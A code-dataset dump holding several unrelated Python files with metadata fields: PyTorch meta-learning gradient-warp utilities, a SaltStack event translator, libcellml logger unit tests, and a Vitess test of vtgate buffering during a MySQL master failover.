step_size=0.5,
first_order=False,
state=None):
"""Update of the meta-parameters with one step of gradient descent on the
loss function.
Parameters
----------
model : `torchmeta.modules.MetaModule` instance
The model.
loss : `torch.Tensor` instance
The value of the inner-loss. This is the result of the training dataset
through the loss function.
params : `collections.OrderedDict` instance, optional
Dictionary containing the meta-parameters of the model. If `None`, then
the values stored in `model.meta_named_parameters()` are used. This is
useful for running multiple steps of gradient descent as the inner-loop.
step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)
The step size in the gradient update. If an `OrderedDict`, then the
keys must match the keys in `params`.
first_order : bool (default: `False`)
If `True`, then the first order approximation of MAML is used.
Returns
-------
updated_params : `collections.OrderedDict` instance
Dictionary containing the updated meta-parameters of the model, with one
gradient update wrt. the inner-loss.
"""
if not isinstance(model, MetaModule):
raise ValueError('The model must be an instance of `torchmeta.modules.'
'MetaModule`, got `{0}`'.format(type(model)))
if params is None:
params = OrderedDict(model.meta_named_parameters())
param_jacobs_lst = [[] for _ in range(len(params))]
for i in range(loss.size(0)):
grads = torch.autograd.grad(loss[i], params.values(), retain_graph=True, create_graph=not first_order)
for j, grad in enumerate(grads):
param_jacobs_lst[j].append(grad)
param_jacobs = [torch.stack(param_jacob, dim=1) for param_jacob in param_jacobs_lst]
if warp_model is not None:
warp_model_input = []
for param in warp_model.warp_parameters:
if param.collect_input:
warp_model_input.append([param.input_data, param.grad_data])
kronecker_matrix_logs = warp_model(warp_model_input)
kronecker_matrices = []
for kronecker_matrix_list in kronecker_matrix_logs:
input_matrices = kronecker_matrix_list[0]
output_matrices = kronecker_matrix_list[1]
exp_input_matrices = []
for matrix in input_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_input_matrices.append(matrix)
exp_output_matrices = []
for matrix in output_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_output_matrices.append(matrix)
kronecker_matrices.append([exp_input_matrices, exp_output_matrices])
updated_params = OrderedDict()
if isinstance(step_size, (dict, OrderedDict)):
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size[name] * grad
else:
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size * grad
return updated_params
| import torch
from collections import OrderedDict
from torchmeta.modules import MetaModule
from .model import BatchParameter
from .transformer_metric import TransformerMetric
from .constant_metric import ConstantMetric
from .expm import torch_expm as expm
def compute_accuracy(logits, targets):
"""Compute the accuracy"""
with torch.no_grad():
if logits.dim() == 2:
_, predictions = torch.max(logits, dim=1)
accuracy = torch.mean(predictions.eq(targets).float())
else:
_, predictions = torch.max(logits, dim=2)
accuracy = torch.mean(predictions.eq(targets).float(), dim=-1)
return accuracy.detach().cpu().numpy()
def tensors_to_device(tensors, device=torch.device('cpu')):
"""Place a collection of tensors in a specific device"""
if isinstance(tensors, torch.Tensor):
return tensors.to(device=device)
elif isinstance(tensors, (list, tuple)):
return type(tensors)(tensors_to_device(tensor, device=device)
for tensor in tensors)
elif isinstance(tensors, (dict, OrderedDict)):
return type(tensors)([(name, tensors_to_device(tensor, device=device))
for (name, tensor) in tensors.items()])
else:
raise NotImplementedError()
class ToTensor1D(object):
"""Convert a `numpy.ndarray` to tensor. Unlike `ToTensor` from torchvision,
this converts numpy arrays regardless of the number of dimensions.
Converts automatically the array to `float32`.
"""
def __call__(self, array):
return torch.from_numpy(array.astype('float32'))
def __repr__(self):
return self.__class__.__name__ + '()'
def make_warp_model(model, constant=False):
metric_params = []
for parameter in model.parameters():
if isinstance(parameter, BatchParameter):
metric_params.append(parameter)
"""
for layer in model.modules():
if isinstance(layer, BatchLinear):
metric_params.append(layer.weight)
"""
if constant:
return ConstantMetric(metric_params)
else:
return TransformerMetric(metric_params)
def kronecker_warp(grad, kronecker_matrices) -> torch.Tensor:
"""
Function for doing Kronecker based warping of gradient batches of an
m x n matrix parameter
Params:
grad (torch.Tensor): gradient batch of shape [meta_batch_size, batch_size m, n]
kronecker_matrices (Tuple[torch.Tensor, torch.Tensor]): kronecker
matrices to do the warping. First element of tuple is of shape
[meta_batch_size, batch_size n, n] second is of shape
[meta_batch_size, batch_size, m, m]
"""
input_matrices = kronecker_matrices[0]
output_matrices = kronecker_matrices[1]
all_matrices = input_matrices + output_matrices
grad = grad.sum(dim=-3)
grad_size = grad.size()
first_matrix = all_matrices[0]
first_matrix = first_matrix.view(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = grad.view(-1, all_matrices[1].size(-1), first_matrix.size(-1))
first_matrix = first_matrix.unsqueeze(1).expand(
first_matrix.size(0), temp.size(0) // first_matrix.size(0), *first_matrix.size()[1:]
).reshape(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = torch.bmm(temp, first_matrix)
right_size = first_matrix.size(-1)
for i, matrix in enumerate(all_matrices[1:]):
matrix = matrix.view(-1, matrix.size(-2), matrix.size(-1))
matrix = matrix.unsqueeze(1).expand(
matrix.size(0), temp.size(0) // matrix.size(0), *matrix.size()[1:]
).reshape(-1, matrix.size(-2), matrix.size(-1))
temp = torch.bmm(matrix, temp)
if i < len(all_matrices) - 2:
right_size *= matrix.size(-1)
temp = temp.view(-1, all_matrices[i + 2].size(-1), right_size)
return temp.view(grad_size)
def gradient_update_parameters_warp(model,
loss,
params=None,
warp_model=None,
step_size=0.5,
first_order=False,
state=None):
"""Update of the meta-parameters with one step of gradient descent on the
loss function.
Parameters
----------
model : `torchmeta.modules.MetaModule` instance
The model.
loss : `torch.Tensor` instance
The value of the inner-loss. This is the result of the training dataset
through the loss function.
params : `collections.OrderedDict` instance, optional
Dictionary containing the meta-parameters of the model. If `None`, then
the values stored in `model.meta_named_parameters()` are used. This is
useful for running multiple steps of gradient descent as the inner-loop.
step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)
The step size in the gradient update. If an `OrderedDict`, then the
keys must match the keys in `params`.
first_order : bool (default: `False`)
If `True`, then the first order approximation of MAML is used.
Returns
-------
updated_params : `collections.OrderedDict` instance
Dictionary containing the updated meta-parameters of the model, with one
gradient update wrt. the inner-loss.
"""
if not isinstance(model, MetaModule):
raise ValueError('The model must be an instance of `torchmeta.modules.'
'MetaModule`, got `{0}`'.format(type(model)))
if params is None:
params = OrderedDict(model.meta_named_parameters())
param_jacobs_lst = [[] for _ in range(len(params))]
for i in range(loss.size(0)):
grads = torch.autograd.grad(loss[i], params.values(), retain_graph=True, create_graph=not first_order)
for j, grad in enumerate(grads):
param_jacobs_lst[j].append(grad)
param_jacobs = [torch.stack(param_jacob, dim=1) for param_jacob in param_jacobs_lst]
if warp_model is not None:
warp_model_input = []
for param in warp_model.warp_parameters:
if param.collect_input:
warp_model_input.append([param.input_data, param.grad_data])
kronecker_matrix_logs = warp_model(warp_model_input)
kronecker_matrices = []
for kronecker_matrix_list in kronecker_matrix_logs:
input_matrices = kronecker_matrix_list[0]
output_matrices = kronecker_matrix_list[1]
exp_input_matrices = []
for matrix in input_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_input_matrices.append(matrix)
exp_output_matrices = []
for matrix in output_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_output_matrices.append(matrix)
kronecker_matrices.append([exp_input_matrices, exp_output_matrices])
updated_params = OrderedDict()
if isinstance(step_size, (dict, OrderedDict)):
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size[name] * grad
else:
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size * grad
return updated_params | en | 0.529667 | Compute the accuracy Place a collection of tensors in a specific device Convert a `numpy.ndarray` to tensor. Unlike `ToTensor` from torchvision, this converts numpy arrays regardless of the number of dimensions. Converts automatically the array to `float32`. for layer in model.modules(): if isinstance(layer, BatchLinear): metric_params.append(layer.weight) Function for doing Kronecker based warping of gradient batches of an m x n matrix parameter Params: grad (torch.Tensor): gradient batch of shape [meta_batch_size, batch_size m, n] kronecker_matrices (Tuple[torch.Tensor, torch.Tensor]): kronecker matrices to do the warping. First element of tuple is of shape [meta_batch_size, batch_size n, n] second is of shape [meta_batch_size, batch_size, m, m] Update of the meta-parameters with one step of gradient descent on the loss function. Parameters ---------- model : `torchmeta.modules.MetaModule` instance The model. loss : `torch.Tensor` instance The value of the inner-loss. This is the result of the training dataset through the loss function. params : `collections.OrderedDict` instance, optional Dictionary containing the meta-parameters of the model. If `None`, then the values stored in `model.meta_named_parameters()` are used. This is useful for running multiple steps of gradient descent as the inner-loop. step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5) The step size in the gradient update. If an `OrderedDict`, then the keys must match the keys in `params`. first_order : bool (default: `False`) If `True`, then the first order approximation of MAML is used. Returns ------- updated_params : `collections.OrderedDict` instance Dictionary containing the updated meta-parameters of the model, with one gradient update wrt. the inner-loss. 
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))) #exp_matrix = exp_matrix.reshape(matrix.size()) #exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1))) #exp_matrix = torch.bmm(exp_matrix, exp_matrix) #exp_matrix = exp_matrix.reshape(matrix.size()) #exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))) #exp_matrix = exp_matrix.reshape(matrix.size()) #exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1))) #exp_matrix = torch.bmm(exp_matrix, exp_matrix) #exp_matrix = exp_matrix.reshape(matrix.size()) | 2.508671 | 3 |
strongr/clouddomain/model/salt/salteventtranslator.py | bigr-erasmusmc/StrongR | 0 | 6612379 | import threading
import fnmatch
import salt.config
import salt.utils.event
import strongr.core
import strongr.clouddomain.factory.intradomaineventfactory
import strongr.clouddomain.factory.interdomaineventfactory
import strongr.clouddomain.model.gateways
import logging
class SaltEventTranslator(threading.Thread):
def run(self):
opts = salt.config.client_config(strongr.core.Core.config().clouddomain.OpenNebula.salt_config + '/master')
inter_domain_event_factory = strongr.clouddomain.model.gateways.Gateways.inter_domain_event_factory()
event = salt.utils.event.get_event(
'master',
sock_dir=opts['sock_dir'],
transport=opts['transport'],
opts=opts)
while True:
ret = event.get_event(full=True)
if ret is None:
continue
try:
if fnmatch.fnmatch(ret['tag'], 'salt/job/*/ret/*'):
data = ret['data']
if 'jid' in data and 'return' in data and 'retcode' in data:
job_finished_event = inter_domain_event_factory.newJobFinishedEvent(data['jid'], data['return'], data['retcode'])
strongr.core.Core.inter_domain_events_publisher().publish(job_finished_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/creating'):
data = ret['data']
if 'name' in data:
vmcreated_event = inter_domain_event_factory.newVmCreatedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmcreated_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/created'):
data = ret['data']
if 'name' in data:
vmready_event = inter_domain_event_factory.newVmReadyEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmready_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/destroyed'):
data = ret['data']
if 'name' in data:
vmdestroyed_event = inter_domain_event_factory.newVmDestroyedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmdestroyed_event)
except Exception as e: # thread must always continue running
logging.getLogger('SaltEventTranslator').warning(str(e))
pass
| import threading
import fnmatch
import salt.config
import salt.utils.event
import strongr.core
import strongr.clouddomain.factory.intradomaineventfactory
import strongr.clouddomain.factory.interdomaineventfactory
import strongr.clouddomain.model.gateways
import logging
class SaltEventTranslator(threading.Thread):
def run(self):
opts = salt.config.client_config(strongr.core.Core.config().clouddomain.OpenNebula.salt_config + '/master')
inter_domain_event_factory = strongr.clouddomain.model.gateways.Gateways.inter_domain_event_factory()
event = salt.utils.event.get_event(
'master',
sock_dir=opts['sock_dir'],
transport=opts['transport'],
opts=opts)
while True:
ret = event.get_event(full=True)
if ret is None:
continue
try:
if fnmatch.fnmatch(ret['tag'], 'salt/job/*/ret/*'):
data = ret['data']
if 'jid' in data and 'return' in data and 'retcode' in data:
job_finished_event = inter_domain_event_factory.newJobFinishedEvent(data['jid'], data['return'], data['retcode'])
strongr.core.Core.inter_domain_events_publisher().publish(job_finished_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/creating'):
data = ret['data']
if 'name' in data:
vmcreated_event = inter_domain_event_factory.newVmCreatedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmcreated_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/created'):
data = ret['data']
if 'name' in data:
vmready_event = inter_domain_event_factory.newVmReadyEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmready_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/destroyed'):
data = ret['data']
if 'name' in data:
vmdestroyed_event = inter_domain_event_factory.newVmDestroyedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmdestroyed_event)
except Exception as e: # thread must always continue running
logging.getLogger('SaltEventTranslator').warning(str(e))
pass
| en | 0.93866 | # thread must always continue running | 1.829654 | 2 |
tests/bindings/python/test_logger.py | 0u812/libcellml | 0 | 6612380 | <filename>tests/bindings/python/test_logger.py
#
# Tests the Error class bindings
#
import unittest
class LoggerTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Logger
# Test create/copy/destroy
x = Logger()
del(x)
y = Logger()
z = Logger(y)
del(y, z)
def test_add_error(self):
from libcellml import Logger, Error
# void addError(const ErrorPtr error)
x = Logger()
x.addError(Error())
def test_error_count(self):
from libcellml import Logger, Error
# size_t errorCount()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
self.assertEqual(x.errorCount(), 1)
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
def test_error(self):
from libcellml import Logger, Error
# ErrorPtr error(size_t index)
x = Logger()
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertIsNone(x.error(-1))
e = Error()
e.setKind(Error.Kind.MODEL)
x.addError(e)
self.assertIsNotNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertEqual(x.error(0).kind(), Error.Kind.MODEL)
def test_clear_errors(self):
from libcellml import Logger, Error
# void clearErrors()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
x.clearErrors()
self.assertEqual(x.errorCount(), 0)
if __name__ == '__main__':
unittest.main()
| <filename>tests/bindings/python/test_logger.py
#
# Tests the Error class bindings
#
import unittest
class LoggerTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Logger
# Test create/copy/destroy
x = Logger()
del(x)
y = Logger()
z = Logger(y)
del(y, z)
def test_add_error(self):
from libcellml import Logger, Error
# void addError(const ErrorPtr error)
x = Logger()
x.addError(Error())
def test_error_count(self):
from libcellml import Logger, Error
# size_t errorCount()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
self.assertEqual(x.errorCount(), 1)
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
def test_error(self):
from libcellml import Logger, Error
# ErrorPtr error(size_t index)
x = Logger()
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertIsNone(x.error(-1))
e = Error()
e.setKind(Error.Kind.MODEL)
x.addError(e)
self.assertIsNotNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertEqual(x.error(0).kind(), Error.Kind.MODEL)
def test_clear_errors(self):
from libcellml import Logger, Error
# void clearErrors()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
x.clearErrors()
self.assertEqual(x.errorCount(), 0)
if __name__ == '__main__':
unittest.main()
| en | 0.14874 | # # Tests the Error class bindings # # Test create/copy/destroy # void addError(const ErrorPtr error) # size_t errorCount() # ErrorPtr error(size_t index) # void clearErrors() | 2.801898 | 3 |
test/vtgate_buffer.py | ramitsurana/vitess | 0 | 6612381 | #!/usr/bin/env python
#
# Copyright 2016, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""Test the vtgate master buffer.
During a master failover, vtgate should automatically buffer (stall) requests
for a configured time and retry them after the failover is over.
The test reproduces such a scenario as follows:
- two threads constantly execute a critical read respectively a write (UPDATE)
- vtctl PlannedReparentShard runs a master failover
- both threads should not see any error during despite the failover
"""
import logging
import Queue
import threading
import time
import unittest
import environment
import tablet
import utils
from mysql_flavor import mysql_flavor
KEYSPACE = 'ks1'
SHARD = '0'
SCHEMA = '''CREATE TABLE buffer(
id BIGINT NOT NULL,
msg VARCHAR(64) NOT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB'''
CRITICAL_READ_ROW_ID = 1
UPDATE_ROW_ID = 2
class AbstractVtgateThread(threading.Thread):
  """Thread which constantly executes a query on vtgate.
  Implement the execute() method for the specific query.
  """
  def __init__(self, vtgate, name, writable=False):
    """Creates the worker and immediately starts the thread.

    Args:
      vtgate: vtgate process object; used to open a new connection.
      name: thread name, also used in failure log messages.
      writable: if True, the cursor is opened writable (needed for
        transactions, i.e. the UPDATE thread).
    """
    super(AbstractVtgateThread, self).__init__(name=name)
    self.vtgate = vtgate
    self.writable = writable
    # Set by stop(); checked by the run() loop to terminate.
    self.quit = False
    # Number of queries successfully executed.
    self.rpcs = 0
    # Number of failed queries.
    self.errors = 0
    # Queue used to notify the main thread that this thread executed
    # "self.notify_after_n_successful_rpcs" RPCs successfully.
    # Then "True" will be put exactly once on the queue.
    self.wait_for_notification = Queue.Queue(maxsize=1)
    # notify_lock guards the two fields below.
    self.notify_lock = threading.Lock()
    # If 0, notifications are disabled.
    self.notify_after_n_successful_rpcs = 0
    # Number of RPCs at the time a notification was requested.
    self.rpcs_so_far = 0
    self.start()
  def run(self):
    """Main loop: runs execute() until stop() is called.

    Failures are counted in self.errors instead of aborting the thread
    because transient errors are exactly what this test measures.
    """
    with self.vtgate.create_connection() as conn:
      c = conn.cursor(keyspace=KEYSPACE, shards=[SHARD], tablet_type='master',
                      writable=self.writable)
      while not self.quit:
        try:
          self.execute(c)
          self.rpcs += 1
          # If notifications are requested, check if we already executed the
          # required number of successful RPCs.
          # Use >= instead of == because we can miss the exact point due to
          # slow thread scheduling.
          with self.notify_lock:
            if (self.notify_after_n_successful_rpcs != 0 and
                self.rpcs >= (self.notify_after_n_successful_rpcs +
                              self.rpcs_so_far)):
              self.wait_for_notification.put(True)
              self.notify_after_n_successful_rpcs = 0
        except Exception as e:  # pylint: disable=broad-except
          self.errors += 1
          logging.debug('thread: %s query failed: %s', self.name, str(e))
        # Wait 10ms between two attempts.
        time.sleep(0.01)
  def execute(self, cursor):
    """Runs one query on the given cursor. Subclasses must override this."""
    raise NotImplementedError('Child class needs to implement this')
  def set_notify_after_n_successful_rpcs(self, n):
    """Requests a one-time notification after n more successful RPCs.

    "True" is put on self.wait_for_notification once the count is reached.
    """
    with self.notify_lock:
      self.notify_after_n_successful_rpcs = n
      self.rpcs_so_far = self.rpcs
  def stop(self):
    """Signals the run() loop to exit after its current iteration."""
    self.quit = True
class ReadThread(AbstractVtgateThread):
    """Background thread that repeatedly runs the critical read on vtgate."""

    def __init__(self, vtgate):
        super(ReadThread, self).__init__(vtgate, 'ReadThread')

    def execute(self, cursor):
        """Issue one SELECT for the critical-read row and log the row count."""
        count = cursor.execute('SELECT * FROM buffer WHERE id = :id',
                               {'id': CRITICAL_READ_ROW_ID})
        logging.debug('read returned %d row(s).', count)
class UpdateThread(AbstractVtgateThread):
    """Background thread that repeatedly runs an UPDATE inside a transaction."""
    def __init__(self, vtgate):
        super(UpdateThread, self).__init__(vtgate, 'UpdateThread', writable=True)
        # Number of executed UPDATE queries.
        self.i = 0
        # COMMIT failures seen so far; exactly one is tolerated (see execute()).
        self.commit_errors = 0
    def execute(self, cursor):
        """Run one BEGIN / UPDATE / COMMIT cycle with a unique msg value."""
        cursor.begin()
        row_count = cursor.execute('UPDATE buffer SET msg=:msg WHERE id = :id',
                                   {'msg': 'update %d' % self.i,
                                    'id': UPDATE_ROW_ID})
        try:
            cursor.commit()
        except Exception as e:  # pylint: disable=broad-except
            # The first COMMIT failure is swallowed (COMMIT is not buffered);
            # any further failure is re-raised and counted as a thread error.
            self.commit_errors += 1
            if self.commit_errors > 1:
                raise
            logging.debug('COMMIT failed. This is okay once because we do not support'
                          ' buffering it. err: %s', str(e))
        self.i += 1
        logging.debug('UPDATE affected %d row(s).', row_count)
# The two tablets used by this test. The "master"/"replica" bindings are
# swapped after every successful failover (see TestBuffer._test_buffer).
master = tablet.Tablet()
replica = tablet.Tablet()
all_tablets = [master, replica]
def setUpModule():
    """Bring up topo server, tablets, vtgate, schema and seed rows."""
    try:
        environment.topo_server().setup()
        setup_procs = [t.init_mysql() for t in all_tablets]
        utils.Vtctld().start()
        utils.wait_procs(setup_procs)
        utils.run_vtctl(['CreateKeyspace', KEYSPACE])
        # Start tablets.
        db_name = 'vt_' + KEYSPACE
        for t in all_tablets:
            t.create_db(db_name)
        # Both tablets start as replicas; InitShardMaster below picks the master.
        master.start_vttablet(wait_for_state=None,
                              init_tablet_type='replica',
                              init_keyspace=KEYSPACE, init_shard=SHARD,
                              tablet_index=0)
        replica.start_vttablet(wait_for_state=None,
                               init_tablet_type='replica',
                               init_keyspace=KEYSPACE, init_shard=SHARD,
                               tablet_index=1)
        for t in all_tablets:
            t.wait_for_vttablet_state('NOT_SERVING')
        # Reparent to choose an initial master and enable replication.
        utils.run_vtctl(['InitShardMaster', '-force', '%s/%s' % (KEYSPACE, SHARD),
                         master.tablet_alias])
        # Create the schema.
        utils.run_vtctl(['ApplySchema', '-sql=' + SCHEMA, KEYSPACE])
        start_vtgate()
        # Insert two rows for the later threads (critical read, update).
        with utils.vtgate.write_transaction(keyspace=KEYSPACE, shards=[SHARD],
                                            tablet_type='master') as tx:
            tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
                       {'id': CRITICAL_READ_ROW_ID, 'msg': 'critical read'})
            tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
                       {'id': UPDATE_ROW_ID, 'msg': 'update'})
    except:
        # Partial setup would leak processes; tear down before re-raising.
        tearDownModule()
        raise
def tearDownModule():
    """Stop all processes and remove temporary state (unless skipped)."""
    utils.required_teardown()
    if utils.options.skip_teardown:
        return
    teardown_procs = [t.teardown_mysql() for t in [master, replica]]
    utils.wait_procs(teardown_procs, raise_on_error=False)
    environment.topo_server().teardown()
    utils.kill_sub_processes()
    utils.remove_tmp_files()
    for t in all_tablets:
        t.remove_tree()
def start_vtgate():
    """Start vtgate with buffering enabled and generous failover timeouts."""
    utils.VtGate().start(extra_args=[
        '-enable_vtgate_buffer',
        # Long timeout in case failover is slow.
        '-vtgate_buffer_window', '10m',
        '-vtgate_buffer_max_failover_duration', '10m',
        '-vtgate_buffer_min_time_between_failovers', '20m'],
        tablets=all_tablets)
class TestBuffer(unittest.TestCase):
    """End-to-end test: vtgate must buffer requests during a master failover."""

    def setUp(self):
        """Restart vtgate before each test case."""
        utils.vtgate.kill()
        # Restart vtgate between each test or the feature
        # --vtgate_buffer_min_time_between_failovers
        # will ignore subsequent failovers.
        start_vtgate()

    def _test_buffer(self, reparent_func):
        """Run a failover via ``reparent_func`` while read/update threads run.

        Asserts that neither background thread saw an error and that vtgate's
        vars show at least one request was buffered during the failover.
        """
        # Start both threads.
        read_thread = ReadThread(utils.vtgate)
        update_thread = UpdateThread(utils.vtgate)
        try:
            # Verify they got at least 2 RPCs through.
            read_thread.set_notify_after_n_successful_rpcs(2)
            update_thread.set_notify_after_n_successful_rpcs(2)
            read_thread.wait_for_notification.get()
            update_thread.wait_for_notification.get()
            # Execute the failover.
            read_thread.set_notify_after_n_successful_rpcs(10)
            update_thread.set_notify_after_n_successful_rpcs(10)
            reparent_func()
            # Failover is done. Swap master and replica for the next test.
            global master, replica
            master, replica = replica, master
            # Block until both threads got 10 more successful RPCs after the
            # failover, so the buffering stats below are meaningful.
            read_thread.wait_for_notification.get()
            update_thread.wait_for_notification.get()
        except:
            # Something went wrong. Kill vtgate first to unblock any buffered requests
            # which would further block the two threads.
            utils.vtgate.kill()
            raise
        finally:
            # Stop threads.
            read_thread.stop()
            update_thread.stop()
            read_thread.join()
            update_thread.join()
        # Both threads must not see any error.
        self.assertEqual(0, read_thread.errors)
        self.assertEqual(0, update_thread.errors)
        # At least one thread should have been buffered.
        # TODO(mberlin): This may fail if a failover is too fast. Add retries then.
        v = utils.vtgate.get_vars()
        labels = '%s.%s' % (KEYSPACE, SHARD)
        self.assertGreater(v['BufferRequestsInFlightMax'][labels], 0)
        logging.debug('Failover was buffered for %d milliseconds.',
                      v['BufferFailoverDurationMs'][labels])

    def test_buffer_planned_reparent(self):
        """Failover triggered through vtctl PlannedReparentShard."""
        def planned_reparent():
            utils.run_vtctl(['PlannedReparentShard', '-keyspace_shard',
                             '%s/%s' % (KEYSPACE, SHARD),
                             '-new_master', replica.tablet_alias])
        self._test_buffer(planned_reparent)

    def test_buffer_external_reparent(self):
        """Failover performed directly on MySQL, then reported to Vitess."""
        def external_reparent():
            # Demote master.
            master.mquery('', mysql_flavor().demote_master_commands())
            if master.semi_sync_enabled():
                master.set_semi_sync_enabled(master=False)
            # Wait for replica to catch up to master.
            utils.wait_for_replication_pos(master, replica)
            # Promote replica to new master.
            replica.mquery('', mysql_flavor().promote_slave_commands())
            if replica.semi_sync_enabled():
                replica.set_semi_sync_enabled(master=True)
            old_master = master
            new_master = replica
            # Configure old master to use new master.
            new_pos = mysql_flavor().master_position(new_master)
            logging.debug('New master position: %s', str(new_pos))
            # Use 'localhost' as hostname because Travis CI worker hostnames
            # are too long for MySQL replication.
            change_master_cmds = mysql_flavor().change_master_commands(
                'localhost', new_master.mysql_port, new_pos)
            old_master.mquery('', ['RESET SLAVE'] + change_master_cmds +
                              ['START SLAVE'])
            # Notify the new vttablet master about the reparent.
            utils.run_vtctl(['TabletExternallyReparented', new_master.tablet_alias])
        self._test_buffer(external_reparent)
if __name__ == '__main__':
utils.main()
| #!/usr/bin/env python
#
# Copyright 2016, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""Test the vtgate master buffer.
During a master failover, vtgate should automatically buffer (stall) requests
for a configured time and retry them after the failover is over.
The test reproduces such a scenario as follows:
- two threads constantly execute a critical read respectively a write (UPDATE)
- vtctl PlannedReparentShard runs a master failover
- both threads should not see any error during despite the failover
"""
import logging
import Queue
import threading
import time
import unittest
import environment
import tablet
import utils
from mysql_flavor import mysql_flavor
KEYSPACE = 'ks1'
SHARD = '0'
SCHEMA = '''CREATE TABLE buffer(
id BIGINT NOT NULL,
msg VARCHAR(64) NOT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB'''
CRITICAL_READ_ROW_ID = 1
UPDATE_ROW_ID = 2
class AbstractVtgateThread(threading.Thread):
"""Thread which constantly executes a query on vtgate.
Implement the execute() method for the specific query.
"""
def __init__(self, vtgate, name, writable=False):
super(AbstractVtgateThread, self).__init__(name=name)
self.vtgate = vtgate
self.writable = writable
self.quit = False
# Number of queries successfully executed.
self.rpcs = 0
# Number of failed queries.
self.errors = 0
# Queue used to notify the main thread that this thread executed
# "self.notify_after_n_successful_rpcs" RPCs successfully.
# Then "True" will be put exactly once on the queue.
self.wait_for_notification = Queue.Queue(maxsize=1)
# notify_lock guards the two fields below.
self.notify_lock = threading.Lock()
# If 0, notifications are disabled.
self.notify_after_n_successful_rpcs = 0
# Number of RPCs at the time a notification was requested.
self.rpcs_so_far = 0
self.start()
def run(self):
with self.vtgate.create_connection() as conn:
c = conn.cursor(keyspace=KEYSPACE, shards=[SHARD], tablet_type='master',
writable=self.writable)
while not self.quit:
try:
self.execute(c)
self.rpcs += 1
# If notifications are requested, check if we already executed the
# required number of successful RPCs.
# Use >= instead of == because we can miss the exact point due to
# slow thread scheduling.
with self.notify_lock:
if (self.notify_after_n_successful_rpcs != 0 and
self.rpcs >= (self.notify_after_n_successful_rpcs +
self.rpcs_so_far)):
self.wait_for_notification.put(True)
self.notify_after_n_successful_rpcs = 0
except Exception as e: # pylint: disable=broad-except
self.errors += 1
logging.debug('thread: %s query failed: %s', self.name, str(e))
